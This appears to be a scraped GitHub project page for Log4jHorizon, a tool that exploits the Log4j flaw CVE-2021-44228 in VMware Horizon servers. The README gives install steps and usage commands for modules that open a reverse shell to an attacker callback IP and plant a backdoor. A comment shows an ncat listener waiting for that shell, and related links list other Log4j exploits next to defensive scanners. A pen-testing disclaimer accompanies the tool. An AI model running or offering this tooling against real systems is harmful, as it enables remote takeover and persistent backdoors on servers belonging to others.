Exploiting CVE-2021-44228 in VMWare Horizon for remote code execution and more.

Overview

Log4jHorizon

Exploiting CVE-2021-44228 in VMWare Horizon for remote code execution and more.

  • BLOG COMING SOON

Code and README.md this time around are a little scatered. Updates coming!

Why?

Proof of concepts for this vulnerability are scattered and have to be performed manually. This repository automates the exploitation process. See the blog post above for guidance on post-exploitation.

Install

This repository can be used manually or with Docker.

Manual install

To download and run the exploit manually, execute the following steps. First, ensure that Java and Maven are installed on your attacker host. To do this using apt on Debian based operating systems, run the following command:

apt update && apt install openjdk-11-jre maven

Clone the GitHub repository and install all python requirements:

git clone --recurse-submodules https://github.com/puzzlepeaches/Log4jHorizon \
    && cd Log4jHorizon && pip3 install -r requirements.txt

From the root of the Log4jHorizon repository, compile the Rogue-Jndi project using the command below:

mvn package -f utils/rogue-jndi/

Docker install

First, ensure that Docker is installed on your attacking host. (I am not going to walk you through doing this)

Following that, execute the following command to clone the repository and build the Docker image we will be using.

git clone --recurse-submodules https://github.com/puzzlepeaches/Log4jHorizon \
    && cd Log4jHorizon && docker build -t Log4jHorizon .

To run the container, run a command similar to the following with your command line flags appended. Note that the container will not catch a reverse shell. You need to create a ncat listener in a separate shell session:

docker run -it -p 1389:1389 Log4jHorizon \
    -r -t horizon.acme.com -i 192.168.1.1 -p 4444

Usage

usage: exploit.py [-h] -t URL -i CALLBACK [-p PORT] [-r] [-b]

optional arguments:
  -h, --help            show this help message and exit
  -t URL, --target URL  VMWare Horizon IP
  -i CALLBACK, --ip CALLBACK
                        Callback IP for payload delivery and reverse shell.
  -p PORT, --port PORT  Callback port for reverse shell.
  -r, --revshell        Module to establish reverse shell using node.exe.
  -b, --backdoor        Module to add backdoor.

Examples

Get a reverse shell using the tool installed on your local system:

python3 exploit.py -r -t horizon.acme.com -p 442 -i 192.168.1.1

Disclaimer

This tool is designed for use during penetration testing; usage of this tool for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state, and federal laws. Developers assume no liability and are not responsible for any misuse of this program.

You might also like...
DNSpooq - dnsmasq cache poisoning (CVE-2020-25686, CVE-2020-25684, CVE-2020-25685)
DNSpooq - dnsmasq cache poisoning (CVE-2020-25686, CVE-2020-25684, CVE-2020-25685)

dnspooq DNSpooq PoC - dnsmasq cache poisoning (CVE-2020-25686, CVE-2020-25684, CVE-2020-25685) For educational purposes only Requirements Docker compo

open detection and scanning tool for discovering and fuzzing for Log4J RCE CVE-2021-44228 vulnerability
open detection and scanning tool for discovering and fuzzing for Log4J RCE CVE-2021-44228 vulnerability

CVE-2021-44228-log4jVulnScanner-metasploit open detection and scanning tool for discovering and fuzzing for Log4J RCE CVE-2021-44228 vulnerability pre

Scan your logs for CVE-2021-44228 related activity and report the attackers

jndiRep - CVE-2021-44228 Basically a bad grep on even worse drugs. search for malicious strings decode payloads print results to stdout or file report

Ingest GreyNoise.io malicious feed for CVE-2021-44228 and apply null routes

log4j-nullroute Quick script to ingest IP feed from greynoise.io for log4j (CVE-2021-44228) and null route bad addresses. Works w/Cisco IOS-XE and Ari

Find vulnerable Log4j2 versions on disk and also inside Java Archive Files (Log4Shell CVE-2021-44228)
Find vulnerable Log4j2 versions on disk and also inside Java Archive Files (Log4Shell CVE-2021-44228)

log4j-finder A Python3 script to scan the filesystem to find Log4j2 that is vulnerable to Log4Shell (CVE-2021-44228) It scans recursively both on disk

Providing DevOps and security teams script to identify cloud workloads that may be vulnerable to the Log4j vulnerability(CVE-2021-44228) in their AWS account.
Providing DevOps and security teams script to identify cloud workloads that may be vulnerable to the Log4j vulnerability(CVE-2021-44228) in their AWS account.

We are providing DevOps and security teams script to identify cloud workloads that may be vulnerable to the Log4j vulnerability(CVE-2021-44228) in their AWS account. The script enables security teams to identify external-facing AWS assets by running the exploit on them, and thus be able to map them and quickly patch them

A scanner and a proof of sample exploit for log4j RCE CVE-2021-44228

1.Create a Sample Vulnerable Application . 2.Start a netcat listner . 3.Run the exploit . 5.Use jdk1.8.0_20 for better results . Exploit-db - https://

A script to search, scrape and scan for Apache Log4j CVE-2021-44228 affected files using Google dorks

Log4j dork scanner This is an auto script to search, scrape and scan for Apache Log4j CVE-2021-44228 affected files using Google dorks. Installation:

Python tool for exploiting CVE-2021-35616

OracleOTM Python tool for exploiting CVE-2021-35616 The script works in modules, which I implemented in the following order: ► Username enumeration ►

Comments
  • problem with reverse shell

    problem with reverse shell

    Make sure an listener is started: ncat -lvnp 442 [*] Reverse shell payload executing now. [*] Starting malicous JNDI Server [*] Firing payload!

    [*] Check for a callback what am i doing wrong?

    opened by eyes-of-ice 2
  • Cannot compile java

    Cannot compile java

    Hello,

    When compiling java I've got the following error.

    Exception in thread "main" java.lang.NoSuchMethodError: 'void com.google.common.base.Preconditions.checkArgument(boolean, java.lang.String, java.lang.Object)' at com.google.inject.Key.ensureRetainedAtRuntime(Key.java:349) at com.google.inject.Key.strategyFor(Key.java:343) at com.google.inject.Key.get(Key.java:227) at org.eclipse.sisu.wire.ParameterKeys.(ParameterKeys.java:28) at org.eclipse.sisu.wire.DependencyAnalyzer.(DependencyAnalyzer.java:93) at org.eclipse.sisu.wire.ElementAnalyzer.(ElementAnalyzer.java:104) at org.eclipse.sisu.wire.WireModule.configure(WireModule.java:74) at com.google.inject.spi.Elements$RecordingBinder.install(Elements.java:347) at com.google.inject.spi.Elements.getElements(Elements.java:104) at com.google.inject.internal.InjectorShell$Builder.build(InjectorShell.java:137) at com.google.inject.internal.InternalInjectorCreator.build(InternalInjectorCreator.java:105) at com.google.inject.Guice.createInjector(Guice.java:87) at com.google.inject.Guice.createInjector(Guice.java:69) at com.google.inject.Guice.createInjector(Guice.java:59) at org.codehaus.plexus.DefaultPlexusContainer.addPlexusInjector(DefaultPlexusContainer.java:481) at org.codehaus.plexus.DefaultPlexusContainer.(DefaultPlexusContainer.java:206) at org.apache.maven.cli.MavenCli.container(MavenCli.java:636) at org.apache.maven.cli.MavenCli.doMain(MavenCli.java:282) at org.apache.maven.cli.MavenCli.main(MavenCli.java:193) at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke0(Native Method) at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62) at java.base/jdk.internal.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43) at java.base/java.lang.reflect.Method.invoke(Method.java:566) at org.codehaus.plexus.classworlds.launcher.Launcher.launchEnhanced(Launcher.java:282) at org.codehaus.plexus.classworlds.launcher.Launcher.launch(Launcher.java:225) at org.codehaus.plexus.classworlds.launcher.Launcher.mainWithExitCode(Launcher.java:406) at org.codehaus.plexus.classworlds.launcher.Launcher.main(Launcher.java:347)

    opened by Q1984 1
Owner
null
Exploiting CVE-2021-44228 in Unifi Network Application for remote code execution and more

Log4jUnifi Exploiting CVE-2021-44228 in Unifi Network Application for remote cod

null 96 Jan 2, 2023
ProxyLogon Full Exploit Chain PoC (CVE-2021–26855, CVE-2021–26857, CVE-2021–26858, CVE-2021–27065)

ExProlog ProxyLogon Full Exploit Chain PoC (CVE-2021–26855, CVE-2021–26857, CVE-2021–26858, CVE-2021–27065) Usage: exprolog.py [OPTIONS] ExProlog -

Herwono W. Wijaya 130 Dec 15, 2022
Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user

Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user Known issues it will not work outside kali , i will update it

Hossam 867 Dec 22, 2022
Exploiting CVE-2021-42278 and CVE-2021-42287

noPac Exploiting CVE-2021-42278 and CVE-2021-42287 原项目noPac在实现上可能有点问题,导致在本地没有打通,于是参考sam-the-admin项目进行修改。 使用 pip3 install -r requirements.txt # GetShel

W4ter 2 Jun 23, 2022
Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user

About Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user Changed from sam-the-admin. Usage SAM THE ADMIN CVE-202

Evi1cg 500 Jan 6, 2023
CVE-2021-26084 Remote Code Execution on Confluence Servers

CVE-2021-26084 CVE-2021-26084 Remote Code Execution on Confluence Servers. Dork Fofa: app="ATLASSIAN-Confluence" Usage Show help information. python P

FQ Hsu 63 Dec 30, 2022
Exploit for GitLab CVE-2021-22205 Unauthenticated Remote Code Execution

Vuln Impact An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files tha

Hendrik Agung 2 Dec 30, 2021
CVE-2021-21985 VMware vCenter Server远程代码执行漏洞 EXP (更新可回显EXP)

CVE-2021-21985 CVE-2021-21985 EXP 本文以及工具仅限技术分享,严禁用于非法用途,否则产生的一切后果自行承担。 0x01 利用Tomcat RMI RCE 1. VPS启动JNDI监听 1099 端口 rmi需要bypass高版本jdk java -jar JNDIIn

r0cky 355 Aug 3, 2022
the metasploit script(POC/EXP) about CVE-2021-22005 VMware vCenter Server contains an arbitrary file upload vulnerability

CVE-2021-22005-metasploit the metasploit script(POC/EXP) about CVE-2021-22005 VMware vCenter Server contains an arbitrary file upload vulnerability pr

Taroballz 25 Nov 15, 2022
HTTP Protocol Stack Remote Code Execution Vulnerability CVE-2022-21907

CVE-2022-21907 Description POC for CVE-2022-21907: HTTP Protocol Stack Remote Code Execution Vulnerability. create by antx at 2022-01-17. Detail HTTP

赛欧思网络安全研究实验室 365 Nov 30, 2022